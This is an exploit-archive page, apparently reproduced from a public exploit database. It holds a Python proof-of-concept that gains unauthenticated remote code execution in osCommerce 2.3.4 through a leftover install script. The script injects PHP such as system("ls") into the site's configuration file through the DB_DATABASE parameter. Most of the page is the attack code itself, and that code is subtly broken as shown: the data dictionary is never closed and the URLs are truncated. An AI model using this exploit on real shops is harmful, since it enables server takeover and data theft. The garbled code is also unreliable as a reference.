Exploits / Vulnerability Discovered : 2018-03-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Oscommerce remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: osCommerce Remote Code Execution
# Date:
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Version:, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.
import requests
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://localhost//oscommerce-"
target_url = "http://localhost/oscommerce-"
data = {
# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'system("ls");' # this is where you enter you PHP payload
payload += '/*'
data['DB_DATABASE'] = payload
# exploit it
r = requests.post(url=target_url, data=data)
if r.status_code == 200:
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
print("[-] Exploit did not execute as planned")